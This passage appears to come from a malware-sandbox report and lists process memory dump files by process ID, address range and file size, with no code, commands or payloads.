                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                            • memory/2480-145-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              572KB

                                                                                                                                                                                                            • memory/2480-174-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                            • memory/2480-150-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              152KB

                                                                                                                                                                                                            • memory/2480-154-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                            • memory/2480-146-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                            • memory/2504-194-0x0000000000400000-0x000000000094A000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              5.3MB

                                                                                                                                                                                                            • memory/2504-187-0x0000000000AC8000-0x0000000000B2D000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              404KB

                                                                                                                                                                                                            • memory/2504-193-0x0000000002680000-0x000000000271D000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              628KB

                                                                                                                                                                                                            • memory/2504-192-0x0000000000AC8000-0x0000000000B2D000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              404KB

                                                                                                                                                                                                            • memory/2712-198-0x0000000000CC0000-0x0000000000CD6000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              88KB

                                                                                                                                                                                                            • memory/3128-255-0x0000000000400000-0x0000000000534000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              1.2MB

                                                                                                                                                                                                            • memory/3128-296-0x0000000002170000-0x000000000221C000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              688KB

                                                                                                                                                                                                            • memory/3128-241-0x00000000006E8000-0x0000000000754000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              432KB

                                                                                                                                                                                                            • memory/3128-294-0x00000000006E8000-0x0000000000754000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              432KB

                                                                                                                                                                                                            • memory/3172-307-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              128KB

                                                                                                                                                                                                            • memory/3384-190-0x0000000000A10000-0x0000000000A19000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              36KB

                                                                                                                                                                                                            • memory/3384-189-0x0000000000A78000-0x0000000000A88000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              64KB

                                                                                                                                                                                                            • memory/3384-191-0x0000000000400000-0x00000000008F5000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              5.0MB

                                                                                                                                                                                                            • memory/3384-186-0x0000000000A78000-0x0000000000A88000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              64KB

                                                                                                                                                                                                            • memory/3452-329-0x0000000075A70000-0x0000000075C85000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                            • memory/3452-321-0x0000000000DB0000-0x00000000010E2000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              3.2MB

                                                                                                                                                                                                            • memory/3452-342-0x0000000073660000-0x00000000736E9000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              548KB

                                                                                                                                                                                                            • memory/3452-324-0x00000000007B0000-0x00000000007B1000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              4KB

                                                                                                                                                                                                            • memory/3452-318-0x0000000000DB0000-0x00000000010E2000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              3.2MB

                                                                                                                                                                                                            • memory/3756-300-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              13.3MB

                                                                                                                                                                                                            • memory/4288-289-0x00007FFF79320000-0x00007FFF79DE1000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              10.8MB

                                                                                                                                                                                                            • memory/4288-260-0x00000000011C0000-0x00000000011C2000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              8KB

                                                                                                                                                                                                            • memory/4288-237-0x0000000000A00000-0x0000000000A2E000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              184KB

                                                                                                                                                                                                            • memory/4344-292-0x0000000002110000-0x0000000002170000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              384KB

                                                                                                                                                                                                            • memory/4452-225-0x0000000000530000-0x0000000000557000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              156KB

                                                                                                                                                                                                            • memory/4452-261-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              584KB

                                                                                                                                                                                                            • memory/4452-233-0x0000000000740000-0x0000000000784000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              272KB

                                                                                                                                                                                                            • memory/5076-286-0x0000000008C50000-0x0000000008CB6000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              408KB

                                                                                                                                                                                                            • memory/5076-222-0x0000000000560000-0x0000000000610000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              704KB

                                                                                                                                                                                                            • memory/5076-267-0x0000000004F30000-0x00000000054D4000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              5.6MB

                                                                                                                                                                                                            • memory/5076-249-0x0000000004E70000-0x0000000004E7A000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              40KB

                                                                                                                                                                                                            • memory/5076-231-0x00000000054E0000-0x0000000005A84000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              5.6MB

                                                                                                                                                                                                            • memory/5076-224-0x0000000004E90000-0x0000000004F2C000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              624KB

                                                                                                                                                                                                            • memory/5076-273-0x0000000072CC0000-0x0000000073470000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              7.7MB

                                                                                                                                                                                                            • memory/5076-291-0x0000000004F30000-0x00000000054D4000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              5.6MB

                                                                                                                                                                                                            • memory/5076-253-0x0000000005120000-0x0000000005176000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              344KB

                                                                                                                                                                                                            • memory/5076-238-0x0000000004F30000-0x0000000004FC2000-memory.dmp
                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                              584KB